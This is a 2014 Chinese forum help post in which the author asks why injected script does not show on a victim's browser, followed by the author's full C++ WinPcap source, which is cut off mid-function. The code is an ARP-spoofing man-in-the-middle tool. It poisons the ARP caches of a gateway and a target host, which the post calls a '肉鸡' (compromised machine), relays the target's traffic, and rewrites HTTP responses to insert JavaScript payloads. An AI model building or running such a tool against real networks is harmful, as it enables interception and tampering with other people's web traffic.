-
-
[旧帖] [求助]一个arp替换数据包的问题 0.00雪花
-
发表于: 2014-4-17 11:02 1671
-
我的程序能替换局域网中一台电脑(不是自己)数据包中的网页中的type=txet/javacript我把它替换成>alert(‘adaa’),替换后数据包中数据被替换了,但是在肉鸡(局域网中一台电脑)上看不到任何结果,我发sproof包给网关和肉鸡都能欺骗,也能到目的mac自己来源网关-》替换成mac自己目的肉鸡mac,和目的mac自己来源肉鸡mac-》替换成目的mac网关来源mac自己,这2个替换都能发包成功,而且如果在发包时设断点也会让肉鸡打开网页出现无法连接的情况,说明欺骗有效果但是为什么,替换数据包后肉鸡打开的相关网页没用任何反应,已经效验过seq和ack(有相关检验数据包),请问大虾是什么原因,这是我源码(192.168.1.115是肉鸡ip,肉鸡mac"00:0C:29:CA:0A:10";)// mirror.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "pcap.h"
#include <stdio.h>
#include<conio.h>
#include <packet32.h> //LPADAPTER
#include <WinSock2.h> //inet_ntoa
#include <Iphlpapi.h> //PIP_ADAPTER_INFO,
#include <process.h> //_beginthreadex,
#include <string>
#include <iostream>
#pragma comment(lib,"wsock32")
#pragma comment(lib,"wpcap")
#pragma comment(lib,"IPHlpApi")
#pragma comment(lib,"packet")
using namespace std;
typedef struct tagSTRLINK
{
char szOld[256];
char szNew[256];
struct tagSTRLINK *next;
}STRLINK, *PSTRLINK;
struct ether_header
{
u_int8_t ether_dhost[6]; /* destination eth addr */
u_int8_t ether_shost[6]; /* source ether addr */
u_int16_t ether_type; /* packet type ID field */
};
/* 4 bytes IP address */
typedef struct ip_address{
u_char byte1;
u_char byte2;
u_char byte3;
u_char byte4;
};
/* IPv4 header */
typedef struct ip_header{
u_char ver_ihl; // Version (4 bits) + Internet header length (4 bits)
u_char tos; // Type of service
u_short tlen; // Total length
u_short identification; // Identification
u_short flags_fo; // Flags (3 bits) + Fragment offset (13 bits)
u_char ttl; // Time to live
u_char proto; // Protocol
u_short crc; // Header checksum
union {
unsigned int ipSource;
ip_address saddr; // Source address
};
union {
unsigned int ipDestination;
ip_address daddr; // Destination address
};
//u_int op_pad; // Option + Padding
};
/* UDP header*/
typedef struct udp_header{
u_short sport; // Source port
u_short dport; // Destination port
u_short len; // Datagram length
u_short crc; // Checksum
};
/*TCP Header*/
struct tcp_header
{
u_int16_t th_sport; /* source port */
u_int16_t th_dport; /* destination port */
u_int32_t th_seq; /* sequence number */
u_int32_t th_ack; /* acknowledgement number */
u_int16_t th_len_resv_code; // Datagram length and reserved code
u_int16_t th_win; /* window */
u_int16_t th_sum; /* checksum */
u_int16_t th_urp; /* urgent pointer */
};
struct ethernet_head
{
unsigned char dest_mac[6]; //目标主机MAC地址
unsigned char source_mac[6]; //源端MAC地址
unsigned short eh_type; //以太网类型
};
struct arp_head
{
unsigned short hardware_type; //硬件类型:以太网接口类型为1
unsigned short protocol_type; //协议类型:IP协议类型为0X0800
unsigned char add_len; //硬件地址长度:MAC地址长度为6B
unsigned char pro_len; //协议地址长度:IP地址长度为4B
unsigned short option; //操作:ARP请求为1,ARP应答为2
unsigned char sour_addr[6]; //源MAC地址:发送方的MAC地址
unsigned long sour_ip; //源IP地址:发送方的IP地址
unsigned char dest_addr[6]; //目的MAC地址:ARP请求中该字段没有意义;ARP响应中为接收方的MAC地址
unsigned long dest_ip; //目的IP地址:ARP请求中为请求解析的IP地址;ARP响应中为接收方的IP地址
unsigned char padding[18]; //数据
};
struct arp_packet //最终arp包结构
{
ethernet_head eth; //以太网头部
arp_head arp; //arp数据包头部
};
typedef struct ip_mac
{
u_long ip; //IP地址
unsigned char mac[6]; //MAC地址
}IP_MAC, *pIP_MAC;
typedef struct acttive_IP_MAC //用于存储ip与对应mac的结构
{
acttive_IP_MAC* next;
IP_MAC IP_MAC;
}ActtiveIP_MAC,*pActtiveIP_MAC;
typedef struct arp_cheat_data //传递给arp欺骗线程的数据
{
pIP_MAC getwip; //网关IP_MAC
pIP_MAC myip; //本机IP_MAC
int seq; //序号
}ArpCheatData, *pArpCheatData;
void HangUntilKeyboartHit();
void AnalyzePacket(const u_char *pkt_data, unsigned int pkt_len);
void ReplacePacket(const u_char *pkt_data, unsigned int pkt_len);
void ReplacePacket2(const u_char *pkt_data, unsigned int pkt_len);
unsigned int _stdcall sproof(void *para);
unsigned char* GetMacByName(char* pDevName);
int GetGatewayIP(pIP_MAC pIP_MAC, unsigned long choosedIP);
unsigned int _stdcall SendPacketToGetAllActtiveIP_MAC(void *para);
unsigned int _stdcall ReceivePacketToGetAllActtiveIP_MAC(void *para);
unsigned int _stdcall TransmitAndSniffer(void *para);
BOOL Replace(const void *in_block, const size_t block_size,
const char *szOld, const char *szNew);
int memreplace(const void *in_block, /* 数据块 */
const size_t block_size, /* 数据块长度 */
const void *in_pattern, /* 需要查找的数据 */
const size_t pattern_size, /* 查找数据的长度 */
const void *in_newpattern, /* 要替换的新数据 */
const size_t newpattern_size, /* 要替换的新数据的长度 */
size_t * shift, /* 移位表,应该是256*size_t的数组 */
bool * init);
USHORT checksum(USHORT *buffer, int size);
void ComputeTcpPseudoHeaderChecksum(ip_header *pIphdr, tcp_header *pTcphdr,
char *payload, int payloadlen);
pActtiveIP_MAC pIP_MACHead=NULL;
int StopReceivePacket=0; //用于控制接收ARP应答线程的标志,1表示终止线程
int cheat[256]; //用于控制欺骗线程的标志
int cheatOver[256]; //用于控制欺骗线程的标志
pcap_t *nicHandle; //保存打开的(已选择)网卡的指针
unsigned long netmask; //子网掩码
PSTRLINK strLink = (PSTRLINK) malloc(sizeof(STRLINK));
PSTRLINK strLink2 = (PSTRLINK) malloc(sizeof(STRLINK));
char errbuf[PCAP_ERRBUF_SIZE];
int main()
{
pcap_if_t *alldevs;
pcap_if_t *d;
int inum;
int i=0;
int maxActive = 0;
pcap_addr *address; //网卡地址
//sockaddr *addr = NULL;
sockaddr_in addr;
in_addr inputAddr;
IP_MAC myIP_MAC, //本机IP地址、MAC地址
fakeIP_MAC, //要伪装成的IP地址、MAC地址
gatewayIP_MAC; //网关IP地址、MAC地址
memset(&myIP_MAC, 0, sizeof(IP_MAC));
memset(&fakeIP_MAC, 0, sizeof(IP_MAC));
memset(&gatewayIP_MAC, 0, sizeof(IP_MAC));
memset(&inputAddr, 0, sizeof(in_addr));
if(pcap_findalldevs(&alldevs, errbuf) == -1)
{
fprintf(stderr,"Error in pcap_findalldevs: %s\n", errbuf);
exit(1);
}
/* Print the list */
for(d=alldevs; d; d=d->next)
{
printf("%d %s",i++, d->name);
if (d->description)
printf(" (%s)\n", d->description);
else
printf(" (No description available)\n");
if(NULL != d->addresses)
{
//if(NULL == du) { du = d; } //后面将监视第一个可以的NIC
address = d->addresses;
if(NULL != address->addr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->addr, sizeof(addr));
// printf(" address: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->netmask)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->netmask, sizeof(addr));
// printf(" netmask: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->broadaddr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->broadaddr, sizeof(addr));
// printf(" broadcast: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
if(NULL != address->dstaddr)
{
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->dstaddr, sizeof(addr));
// printf(" destaddr: %d, %s\n", addr.sin_family, inet_ntoa(addr.sin_addr));
}
}
}
if(i==0)
{
printf("\nNo interfaces found! Make sure WinPcap is installed.\n");
return -1;
}
printf("Enter the interface number (1-%d):",i);
scanf_s("%d", &inum,10);
if(inum < 1 || inum > i)
{
printf("\nInterface number out of range.\n");
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
/* Retrieve the device list */
/* Jump to the selected adapter */
for(d=alldevs, i=0; i< inum-1 ;d=d->next, i++);
/* Open the device */
/* Open the adapter */
if ((nicHandle= pcap_open_live(d->name, // name of the device
65536, // portion of the packet to capture.
// 65536 grants that the whole packet will be captured on all the MACs.
1, // promiscuous mode (nonzero means promiscuous)
1000, // read timeout
errbuf // error buffer
)) == NULL)
{
fprintf(stderr,"\nUnable to open the adapter. %s is not supported by WinPcap\n", d->name);
/* Free the device list */
pcap_freealldevs(alldevs);
return -1;
}
memcpy(myIP_MAC.mac, GetMacByName(d->name), 6);
printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n",
myIP_MAC.mac[0], myIP_MAC.mac[1], myIP_MAC.mac[2],
myIP_MAC.mac[3], myIP_MAC.mac[4], myIP_MAC.mac[5]);
printf("\nlistening on %s...\n", d->description);
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
printf("xnjmacis selected:= %02X-%02X-%02X-%02X-%02X-%02X ",mc[0],mc[1],mc[2],mc[3],mc[4],mc[5]);
/* At this point, we don't need any more the device list. Free it */
// HangUntilKeyboartHit();
for(address=d->addresses; address; address=address->next)
{
//得到用户选择的网卡的一个IP地址
myIP_MAC.ip = ((struct sockaddr_in *)address->addr)->sin_addr.s_addr;
//得到该IP地址对应的子网掩码
netmask = ((struct sockaddr_in *)(address->netmask))->sin_addr.S_un.S_addr;
if (!myIP_MAC.ip || !netmask)
{
continue;
}
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->addr, sizeof(addr));
printf(", IP = %s", inet_ntoa(addr.sin_addr));
memset(&addr, 0, sizeof(addr));
memcpy(&addr, address->netmask, sizeof(addr));
printf(", netmask = %s\n", inet_ntoa(addr.sin_addr));
break;
}
if (address == NULL)
{
printf("\nNo IP && netmask of selected NIC! Make sure NIC had been right seted.\n");
pcap_close(nicHandle);
pcap_freealldevs(alldevs);
HangUntilKeyboartHit();
return 1;
}
Sleep(200);
printf("\nScan net info, please wait...\n");
/* 获取网关的IP地址, MAC地址由扫描网关ARP应答包得到*/
if(GetGatewayIP(&gatewayIP_MAC, myIP_MAC.ip))
{
memset(&addr, 0, sizeof(addr));
addr.sin_addr.S_un.S_addr = gatewayIP_MAC.ip;
printf("\ngetway: IP = %s", inet_ntoa(addr.sin_addr));
}
printf("aaa");
/* 扫描局域网内活动主机*/
unsigned long sendArphd, recvArphd, transhd, sproofhd[256]; //用于线程控制的变量
unsigned sendArpId, recvArpId, transId, sproofId[256]; //用于线程控制的变量
//SendPacketToGetAllActtiveIP_MAC(&myIP_MAC);
// sendArphd = _beginthreadex(NULL, 0, SendPacketToGetAllActtiveIP_MAC, &myIP_MAC, 0, &sendArpId); //开启arp扫描包线程
// recvArphd = _beginthreadex(NULL, 0, ReceivePacketToGetAllActtiveIP_MAC, &myIP_MAC, 0, &recvArpId); //开启接收arp响应包线程
// WaitForSingleObject((HANDLE)sendArphd, INFINITE); //主线程停止等待发送线程结束
//
//// Sleep(10000);
// unsigned long tick = GetTickCount();
// printf(" ");
// while(GetTickCount() - tick < 3000) //等待回应包到达,共等待3s
// {
// printf("\b\b\");
// Sleep(10);
// printf("\b\b\");
// Sleep(10);
// printf("\b\b|");
// Sleep(10);
// printf("\b\b|");
// Sleep(10);
// printf("\b\b/");
// Sleep(10);
// printf("\b\b/");
// Sleep(10);
// printf("\b\b-");
// Sleep(10);
// printf("\b\b-");
// Sleep(10);
// }
// printf("\b\b\b");
// printf("\b\b\b");
// Sleep(1000);
// StopReceivePacket = 1;//置标志,停止接收线程ReceivePacketToGetAllActtiveIP_MAC
// WaitForSingleObject((HANDLE)recvArphd, INFINITE); //主线程停止等待接收线程结束
// if(pIP_MACHead != NULL)
// {
// /*过滤,删除重复的活动主机IP_MAC*/
// pActtiveIP_MAC z, k, j;
// /* for(k=pIP_MACHead;k->next!=NULL;k=k->next)
// {
// for(z=k;z->next!=NULL;)
// {
// if((k->IP_MAC.ip == z->next->IP_MAC.ip)
// &&(memcmp(k->IP_MAC.mac, z->next->IP_MAC.mac, 6)==0))
// {
// j = z->next;
// z->next = j->next;
// delete j;
// j = NULL;
// }
// else
// {
// z = z->next;
// }
// }
// }*/
//
// /*获取网关的信息*/
// /*if(pIP_MACHead->IP_MAC.ip == gatewayIP_MAC.ip)
// {
// memcpy(gatewayIP_MAC.mac, pIP_MACHead->IP_MAC.mac, 6);
// printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n",
// gatewayIP_MAC.mac[0], gatewayIP_MAC.mac[1], gatewayIP_MAC.mac[2],
// gatewayIP_MAC.mac[3], gatewayIP_MAC.mac[4], gatewayIP_MAC.mac[5]);
// j = pIP_MACHead;
// pIP_MACHead = pIP_MACHead->next;
// delete j;
// j = NULL;
// }
// else
// {
// for(k = pIP_MACHead; k->next != NULL; k = k->next)
// {
// if(k->next->IP_MAC.ip == gatewayIP_MAC.ip)
// {
// memcpy(gatewayIP_MAC.mac, k->next->IP_MAC.mac, 6);
// printf(", MAC = %02X-%02X-%02X-%02X-%02X-%02X\n\n", gatewayIP_MAC.mac[0],
// gatewayIP_MAC.mac[1], gatewayIP_MAC.mac[2], gatewayIP_MAC.mac[3],
// gatewayIP_MAC.mac[4], gatewayIP_MAC.mac[5]);
// j = k->next;
// k->next = j->next;
// delete j;
// j = NULL;
// break;
// }
// }
// }
// */
// /*输出列表*/
// for(z = pIP_MACHead,i = 1; z != NULL; z = z->next, i++)
// {
// memset(&addr, 0, sizeof(addr));
// addr.sin_addr.S_un.S_addr = z->IP_MAC.ip;
// printf("%-3d IP = %-20s MAC = %02X-%02X-%02X-%02X-%02X-%02X\n",
// i, inet_ntoa(addr.sin_addr), z->IP_MAC.mac[0], z->IP_MAC.mac[1],
// z->IP_MAC.mac[2], z->IP_MAC.mac[3], z->IP_MAC.mac[4], z->IP_MAC.mac[5]);
// }
// // maxActive = i - 1;
// }
// else
// {
// printf(" Get nothing, please check you net.\n");
// }
/*CloseHandle((HANDLE)sendArphd);
CloseHandle((HANDLE)recvArphd);*/
Sleep(200);
//"p";
// char *od="<div>";
char od[256]="type=\"text/javascript\">";
char od2[256]="type='text/javascript'>";
// char *od2="text/javascript'></script>";
//char *od="script>";
// char *od2="text/javascript'></script>";
//char *od2="(t>";
strcpy_s(strLink->szOld,od);
strLink->szOld[strlen(od)-1] = '\0';
//string sta="<script type='text/javascript'>alert('smf');windows.location.href='www.163.com';</scrippt>sss";
// string sta=">alert('a')";
// string sta=";
//char *mf="<gif>";
//alert('aaa');";
//char *mf=(char *)sta.c_str();
char mf[256]=">alert('hffscriptstrl')";
//strcpy_s(*mf,sta);
strcpy_s(strLink->szNew,mf);
strLink->szOld[strlen(mf)-1] = '\0';
/*string so;
for (int i = 0; i < 20; i++)
{
so+=mf[i];
}
cout<<so<<endl;*/
//memset(cheat, 0, 256);
strLink->next = (PSTRLINK) malloc(sizeof(STRLINK));
strcpy_s(strLink->next->szOld,od2);
strLink->next->szOld[strlen(od2)-1] = '\0';
char mf2[256]=">alert('hfbscriptstrl')";
//strcpy_s(*mf,sta);
strcpy_s(strLink->next->szNew,mf2);
strLink->next->szOld[strlen(mf2)-1] = '\0';
strLink->next->next=NULL;
/*strcpy_s(strLink2->szOld,od2);
char mf2[7]="('ss')";
strcpy_s(strLink2->szNew,mf2);
strLink2->szOld[strlen(mf2)-1] = '\0';*/
ArpCheatData ArpCheatData;
ArpCheatData.getwip = &gatewayIP_MAC;
ArpCheatData.myip = &myIP_MAC;
transhd = _beginthreadex(NULL, 0, TransmitAndSniffer, &ArpCheatData, 0, &transId); //开启转发线程
transhd = _beginthreadex(NULL, 0, sproof, &ArpCheatData, 0, &transId);
Sleep(5000000);
HangUntilKeyboartHit();
pcap_freealldevs(alldevs);
return 0;
}
int GetGatewayIP(pIP_MAC pIP_MAC, unsigned long choosedIP)
{
PIP_ADAPTER_INFO pAdapterInfo = NULL;
PIP_ADAPTER_INFO pAdapter = NULL;
DWORD dwRetVal = 0;;
pAdapterInfo = (IP_ADAPTER_INFO *) malloc( sizeof(IP_ADAPTER_INFO) );
unsigned long ulOutBufLen = sizeof(IP_ADAPTER_INFO);
// Make an initial call to GetAdaptersInfo to get
// the necessary size into the ulOutBufLen variable
if (GetAdaptersInfo( pAdapterInfo, &ulOutBufLen) == ERROR_BUFFER_OVERFLOW)
{
free(pAdapterInfo);
pAdapterInfo = (IP_ADAPTER_INFO *) malloc (ulOutBufLen);
}
if ((dwRetVal = GetAdaptersInfo( pAdapterInfo, &ulOutBufLen)) == NO_ERROR)
{
pAdapter = pAdapterInfo;
while (pAdapter)
{
if(choosedIP==inet_addr(pAdapter->IpAddressList.IpAddress.String))
{
pIP_MAC->ip=inet_addr(pAdapter->GatewayList.IpAddress.String);
return 1;
}
printf("\t***\n");
pAdapter = pAdapter->Next;
}
}
return 0;
}
unsigned char* GetMacByName(char* pDevName)
{
static u_char mac[6];
memset(mac,0,sizeof(mac));
LPADAPTER lpAdapter = PacketOpenAdapter(pDevName);
if (!lpAdapter || (lpAdapter->hFile == INVALID_HANDLE_VALUE))
{
return NULL;
}
PPACKET_OID_DATA OidData = (PPACKET_OID_DATA)malloc(6 + sizeof(PACKET_OID_DATA));
if (OidData == NULL)
{
PacketCloseAdapter(lpAdapter);
return NULL;
}
//
// Retrieve the adapter MAC querying the NIC driver
//
OidData->Oid = OID_802_3_CURRENT_ADDRESS;
OidData->Length = 6;
memset(OidData->Data, 0, 6);
BOOLEAN Status = PacketRequest(lpAdapter, FALSE, OidData);
if(Status)
{
memcpy(mac,(u_char*)(OidData->Data),6);
}
free(OidData);
PacketCloseAdapter(lpAdapter);
return mac;
}
void HangUntilKeyboartHit()
{
printf("\nPress any key to continue.");
while (!_kbhit()) { /* do nothing */ };
}
unsigned int _stdcall sproof(void *para)
{
pArpCheatData parpcheatData = (pArpCheatData)para;
int j;
unsigned char sendbuftogate[60],sendbuftosp[60],rsendbuftogate[60],rsendbuftosp[60];
//pActtiveIP_MAC spip;
ethernet_head eth;
arp_head arp;
int k;
//for(spip=pIP_MACHead,j=0;j<parpcheatData->seq-1;spip=spip->next,j++);
in_addr addr;
addr.S_un.S_addr = inet_addr("192.168.1.115");
u_long sdr=inet_addr("192.168.1.115");
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
int i=0;
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
memcpy(eth.dest_mac,parpcheatData->getwip->mac,6);
memcpy(eth.source_mac,parpcheatData->myip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->myip->mac, 6);
memcpy(arp.dest_addr,parpcheatData->getwip->mac, 6);
eth.eh_type=htons(0x0806);
arp.hardware_type=htons(0x0001);
arp.protocol_type=htons(0x0800);
arp.add_len=6;
arp.pro_len=4;
arp.option=htons(0x0002);
arp.sour_ip=sdr;
arp.dest_ip=parpcheatData->getwip->ip;
memset(arp.padding,0,18);
memset(sendbuftogate,0,sizeof(sendbuftogate));
memcpy(sendbuftogate,ð,sizeof(eth));
memcpy(sendbuftogate+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,mc,6);
memcpy(eth.source_mac,parpcheatData->myip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->myip->mac, 6);
memcpy(arp.dest_addr,mc, 6);
arp.sour_ip=parpcheatData->getwip->ip;
arp.dest_ip=sdr;
memset(sendbuftosp,0,sizeof(sendbuftosp));
memcpy(sendbuftosp,ð,sizeof(eth));
memcpy(sendbuftosp+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,mc,6);
memcpy(eth.source_mac,parpcheatData->getwip->mac, 6);
memcpy(arp.sour_addr,parpcheatData->getwip->mac, 6);
memcpy(arp.dest_addr,mc, 6);
arp.sour_ip=parpcheatData->getwip->ip;
arp.dest_ip=sdr;
memset(rsendbuftosp,0,sizeof(rsendbuftosp));
memcpy(rsendbuftosp,ð,sizeof(eth));
memcpy(rsendbuftosp+sizeof(eth),&arp,sizeof(arp));
memcpy(eth.dest_mac,parpcheatData->getwip->mac,6);
memcpy(eth.source_mac,mc, 6);
memcpy(arp.sour_addr,mc, 6);
memcpy(arp.dest_addr,parpcheatData->getwip->mac, 6);
arp.sour_ip=sdr;
arp.dest_ip=parpcheatData->getwip->ip;
memset(rsendbuftogate,0,sizeof(rsendbuftogate));
memcpy(rsendbuftogate,ð,sizeof(eth));
memcpy(rsendbuftogate+sizeof(eth),&arp,sizeof(arp));
// printf("begin cheat seq = %d\n",parpcheatData->seq);
while(TRUE)
{
//首先检查是否取消了欺骗
if(pcap_sendpacket(nicHandle,sendbuftogate,60)!=0)
{
printf("sendbuftogate Error: %d\n",GetLastError());
return 0;
}
if(pcap_sendpacket(nicHandle,sendbuftosp,60)!=0)
{
printf("sendbuftosp Error: %d\n",GetLastError());
return 0;
}
Sleep(500);
}
}
void AnalyzePacket(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
ip_header *ih = (ip_header*)(pkt_data+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
int ip_len = ntohs(ih->tlen);//ip_len = ip_body + ip_header
// bool find_http =false;
// CString http_txt = "";
bool find_http = true;
string http_txt = "";
size_t ip_header_len = (ih->ver_ihl & 0xf) * 4;
tcp_header* th = (tcp_header *) ((u_char*)ih + ip_header_len);
ip_len=ip_len-ip_header_len;
char* ip_pkt_data = (char*)th;
if (ntohs(th->th_dport)==80||ntohs(th->th_sport)==80)
{
for(int im=0;im<ip_len;++im)
{
// printf("ishttppacket");
char* sr="<script type='text/javascript'>alert('aaa')<scrippt>";
if(!find_http&&(im+strlen("text/html")<ip_len) &&strncmp(ip_pkt_data+im,"text/html",strlen("text/html"))==0)
{
// char* py= strstr(ip_pkt_data,"</head>");
find_http = true;
// memset(sendbuf+20+im,0x80,1600-20-im);
}
/*if(find_http )
{
http_txt+=ip_pkt_data[im];
}*/
}
if(find_http )
{
for(int imc=100;imc< pkt_len;++imc )
http_txt+=ip_pkt_data[imc];
}
}
if(http_txt != ""){
cout<<http_txt;
cout<<endl<<"***********************************************************"<<endl<<endl;
}
}
}
}
unsigned int _stdcall TransmitAndSniffer(void *para)
{
pArpCheatData parpcheatData = (pArpCheatData)para;
struct changemac
{
unsigned char mac[12];
};
unsigned char bcast[6];
memset(bcast,0xff,sizeof(bcast));
unsigned char sendbuf[1600];
struct pcap_pkthdr * pkt_header;
u_char * pkt_data;
changemac *cmac,*togatewaymac;
pActtiveIP_MAC z;
int i,j;
char data[] = "00:0C:29:CA:0A:10";
unsigned int tmp[6];
unsigned char mc[6];
memset(mc, 0, sizeof(mc));
sscanf_s(data, "%2x:%2x:%2x:%2x:%2x:%2x", &tmp[0], &tmp[1], &tmp[2], &tmp[3], &tmp[4], &tmp[5],50);
for (i = 0; i < 6; i++) {
mc[i] = (unsigned char)tmp[i];
}
cmac=new changemac;
togatewaymac=new changemac;
memcpy(togatewaymac->mac,parpcheatData->getwip->mac,6);
memcpy(togatewaymac->mac+6,parpcheatData->myip->mac,6);
pcap_dumper_t *dumpfile = pcap_dump_open(nicHandle, "dumpfile.txt");
while(true)
{
j=pcap_next_ex(nicHandle,&pkt_header,(const u_char**)&pkt_data);
if(j==0)
{
continue;
}
//memset(sendbuf,0,pkt_header->len);
//=(char)malloc();
if(*(unsigned short *)(pkt_data+12)==htons(0x0800)
&&(!(memcmp(pkt_data+6,parpcheatData->myip->mac,6)==0))
&&*(unsigned long *)(pkt_data+30)!=parpcheatData->myip->ip
&&(!(memcmp(pkt_data,bcast,6)==0)))
{
memcpy(sendbuf,pkt_data,pkt_header->caplen);
if(memcmp(pkt_data,parpcheatData->myip->mac,6)&&memcmp(pkt_data+6,mc,6))
{ ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
memcpy(sendbuf,togatewaymac,12);
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
ReplacePacket(sendbuf, pkt_header->len);
//ReplacePacket2(sendbuf, pkt_header->len);
int y =0;
}
}
}
if(*(unsigned long *)(pkt_data+30)==inet_addr("192.168.1.115")&&memcmp(pkt_data,parpcheatData->myip->mac,6)&&memcmp(pkt_data+6,parpcheatData->getwip->mac,6))
{
ether_header *eh = (ether_header*)pkt_data;
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
int ip_len = ntohs(ih->tlen);//ip_len = ip_body + ip_header
bool find_http = false;
// CString http_txt = "";
// bool find_http = false;
string http_txt = "";
size_t ip_header_len = (ih->ver_ihl & 0xf) * 4;
tcp_header* th = (tcp_header *) ((u_char*)ih + ip_header_len);
ip_len=ip_len-ip_header_len;
char* ip_pkt_data = (char*)th;
if (ntohs(th->th_dport)==80||ntohs(th->th_sport)==80)
{
for(int im=0;im<ip_len;++im)
{
// printf("ishttppacket");
char* sr="<script type='text/javascript'>alert('aaa')<scrippt>";
if(!find_http&&(im+strlen("text/html")<ip_len) &&strncmp(ip_pkt_data+im,"text/html",strlen("text/html"))==0)
{
// char* py= strstr(ip_pkt_data,"</head>");
find_http = true;
// memset(sendbuf+20+im,0x80,1600-20-im);
}
if(find_http )
{
http_txt+=ip_pkt_data[im];
}
}
}
if(http_txt != ""){
/* cout<<http_txt;
cout<<endl<<"***********************************************************"<<endl<<endl;*/
}
}
}
if(ntohs(eh->ether_type)==0x0800)
{ // ip packet only
memcpy(cmac->mac,mc,6);
memcpy(cmac->mac+6,parpcheatData->myip->mac,6);
memcpy(sendbuf,cmac,12);
ip_header *ih = (ip_header*)(sendbuf+14);
if(ntohs(ih->proto) == 0x0600)
{ // tcp packet only
/*char cm[6];
memset(cm,0xff,6);
memcpy(cm,pkt_data,6);
printf(" selected:= %.2X-%.2X-%.2X-%.2X-%.2X-%.2X ",cm[0],cm[1],cm[2],cm[3],cm[4],cm[5]);*/
//char * sf=(char *)malloc(500);
////memset(sendbuf+500,0xFF,);
//memset(sf,0xFF,500);
//memcpy(sendbuf+1025,sf,500);
ReplacePacket(sendbuf, pkt_header->len);
//ReplacePacket2(sendbuf, pkt_header->len);
// break;
}
}
}
/* save the packet on the dump file */
pcap_dump((unsigned char *)dumpfile, pkt_header, pkt_data);
pcap_sendpacket(nicHandle,sendbuf,pkt_header->len);
}
}
pcap_dump_close(dumpfile);
return 1;
}
void ReplacePacket(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh;
ip_header *ih;
tcp_header *th;
u_int ip_len;
eh = (ether_header *) pkt_data;
if(eh->ether_type != htons(0x0800))
return; // 只转发IP包
// 找到IP头的位置
ih = (ip_header *) (pkt_data + 14); //14为以太头的长度
// 找到TCP的位置
ip_len = (ih->ver_ihl & 0xf) * 4;
th = (tcp_header *) ((u_char*)ih + ip_len);
// 得到TCP数据包的指针和长度
unsigned char *datatcp = (unsigned char *) ih + sizeof(ip_header)
+ sizeof(struct tcp_header);
int lentcp = ntohs(ih->tlen) - (sizeof(ip_header) + sizeof(tcp_header));
// 开始替换数据内容,重新计算校验和
PSTRLINK pTmp = strLink;
int i = 0;
/*while (pTmp->next)
{*/
// 开始匹配规则进行替换
while (pTmp)
{
if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
pTmp = pTmp->next;
}
else
{
pTmp = pTmp->next;
}
}
// pTmp = pTmp->next;
//}
/*if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
{
printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
i ++;
}*/
if (i>0) // 重新计算校验和
{
if (pkt_len>600)
{
AnalyzePacket(pkt_data,pkt_len);
printf(" Done %d replacements, forwarding packet of size %d\n",
i, pkt_len);
ih->crc = 0;
th->th_sum = 0;
ih->crc = checksum((USHORT *)ih,sizeof(ip_header));
ComputeTcpPseudoHeaderChecksum(ih, th, (char *)datatcp, lentcp);
// ReplacePacket2( pkt_data, pkt_len);
}
return;
}
else
{
// printf(" Forwarding untouched packet of size %d\n", pkt_len);
}
}
void ReplacePacket2(const u_char *pkt_data, unsigned int pkt_len)
{
ether_header *eh;
ip_header *ih;
tcp_header *th;
u_int ip_len;
eh = (ether_header *) pkt_data;
if(eh->ether_type != htons(0x0800))
return; // 只转发IP包
// 找到IP头的位置
ih = (ip_header *) (pkt_data + 14); //14为以太头的长度
// 找到TCP的位置
ip_len = (ih->ver_ihl & 0xf) * 4;
th = (tcp_header *) ((u_char*)ih + ip_len);
// 得到TCP数据包的指针和长度
unsigned char *datatcp = (unsigned char *) ih + sizeof(ip_header)
+ sizeof(struct tcp_header);
int lentcp = ntohs(ih->tlen) - (sizeof(ip_header) + sizeof(tcp_header));
// 开始替换数据内容,重新计算校验和
PSTRLINK pTmp = strLink2;
int i = 0;
/*while (pTmp->next)
{*/
// 开始匹配规则进行替换
//while (pTmp)
//{
// if (Replace(datatcp, lentcp, pTmp->szOld, pTmp->szNew))
// {
// printf(" Applying rul %s ==> %s\n", pTmp->szOld, pTmp->szNew);
// i ++;
// //pTmp = pTmp->next;
// }
//
// pTmp = pTmp->next;
//
//}
